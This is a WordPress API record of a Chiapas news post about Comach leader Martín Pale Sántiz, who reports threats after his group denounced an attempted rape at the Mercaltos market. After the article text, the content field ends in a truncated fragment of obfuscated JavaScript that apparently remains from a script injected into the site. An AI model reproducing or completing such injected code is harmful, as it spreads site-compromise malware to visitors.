{"id":8693,"date":"2023-02-15T03:44:09","date_gmt":"2023-02-15T03:44:09","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8693"},"modified":"2023-02-15T03:44:10","modified_gmt":"2023-02-15T03:44:10","slug":"teme-martin-pale-lider-de-la-comach-por-su-integridad-ante-amenazas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8693","title":{"rendered":"Teme Mart\u00edn Pale, l\u00edder de la Comach por su integridad ante amenazas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-14-at-4.25.42-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-8695\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-14-at-4.25.42-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-14-at-4.25.42-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-14-at-4.25.42-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-14-at-4.25.42-PM.jpeg 1408w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>14 de febrero del 2023. San Crist\u00f3bal de Las Casas.- Mart\u00edn Pale S\u00e1ntiz, dirigente de la Coordinadora de Organizaciones por el Medio Ambiente para un Chiapas Mejor (Comach) dijo que teme por si vida, ya que ha recibido amenazas, esto derivado a que junto con sus agremiados, denunciaron un intento de violaci\u00f3n cometido en contra de una agremiada, por el administrador del Mercado de Abasto de los Altos (Mercaltos) de San Crist\u00f3bal, V\u00edctor Flores Ruiz.<\/p>\n\n\n\n<p>\u201cTemo por mi integridad f\u00edsica, he recibido algunas llamadas de amenazas que no pasa de ma\u00f1ana pasado que me van a topar, quiero responsabilizar si algo me pasa al licenciado \u00c1lvaro Ramos, empresario de Mercaltos; \u00d3scar Berm\u00fadez que es el apoderado legal; V\u00edctor Manuel Flores Ruiz, que es el administrador que trata de regresar, voy a trasladarme a la fiscal\u00eda a iniciar una denuncia\u201d, dijo.<\/p>\n\n\n\n<p>En conferencia de prensa, dej\u00f3 en claro que las personas que el pasado lunes se manifestaron frente a las instalaciones del Palacio de justicia de San Crist\u00f3bal, no son locatarios de Mercaltos, y que solamente fueron pagados, \u201cincluyendo la se\u00f1ora Isabel Ancheyta, quien no lo conocen, es una persona pagada para esa entrevista\u201d.<\/p>\n\n\n\n<p>Indic\u00f3 que los j\u00f3venes que estuvieron manifest\u00e1ndose el pasado lunes, son de las comunidades de Taza de Agua, El Pinar y la zona norte de esta ciudad, de cuyos l\u00edderes los tiene ubicados, pero que por la denuncia que presentar\u00eda los omito, a quienes tambi\u00e9n \u201clos responsabiliz\u00f3 de lo que me pueda suceder\u201d.<\/p>\n\n\n\n<p>Pidi\u00f3 a la fiscal\u00eda de Chiapas, intervenir conforme a derecho, y no considerar alguna \u201cdenuncia falsa en mi contra\u201d, ya que con la conferencia que dieron el pasado lunes, \u201cque la gente de Mercaltos sufrieron por un grupo de choque que contrat\u00f3 \u00c1lvaro Ramos\u201d.<\/p>\n\n\n\n<p>\u201cQuiero dejar en claro que si viene alg\u00fan grupo de choque a agredir en Mercaltos, Comach no se ha metido en este tipo de problemas pero nos obliga a dar el respaldo. Si contratan un grupo de choque y le pasa algo a la gente, los hago responsables y pido a las autoridades que intervengan\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 14 de febrero del 2023. San Crist\u00f3bal de Las Casas.- Mart\u00edn Pale S\u00e1ntiz, dirigente de la Coordinadora de Organizaciones por el Medio Ambiente para un Chiapas Mejor (Comach) dijo que teme por si vida, ya que ha recibido amenazas, esto derivado a que junto con sus agremiados, denunciaron un intento de violaci\u00f3n cometido &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8695,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8693","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8693","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8693"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8693\/revisions"}],"predecessor-version":[{"id":8696,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8693\/revisions\/8696"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8695"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}